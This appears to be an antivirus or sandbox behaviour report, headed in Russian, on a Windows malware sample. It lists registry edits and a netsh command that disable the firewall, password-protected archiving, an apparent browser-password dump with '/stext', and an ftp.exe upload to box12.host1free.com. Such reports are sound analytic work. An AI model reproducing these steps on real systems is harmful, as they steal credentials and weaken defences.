Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- %TEMP%\1.tmp\add.exe a 10.0.0.1@16:33:04.rar *.dll -psafahi@
- %TEMP%\1.tmp\add.exe c -zinfo 10.0.0.1@16:33:04.rar -k
- %TEMP%\1.tmp\add.exe x 1.exe *.bin -phicham@
- %TEMP%\1.tmp\web.bin /stext %USERNAME%.dll
- <SYSTEM32>\ftp.exe -n -s:ftpcmd.dat box12.host1free.com
- <SYSTEM32>\notepad.exe c:\Texte.txt
- <SYSTEM32>\netsh.exe firewall set opmode disable
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Call.bat" "
- <SYSTEM32>\ipconfig.exe
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\Texte.txt
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\ip.txt
- %TEMP%\1.tmp\%USERNAME%.dll
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\Call.bat
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\%USERNAME%.dll
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\ip.txt
- 'localhost':1039
- 'bo###.host1free.com':21
- DNS ASK bo###.host1free.com
- ClassName: 'Shell_TrayWnd' WindowName: ''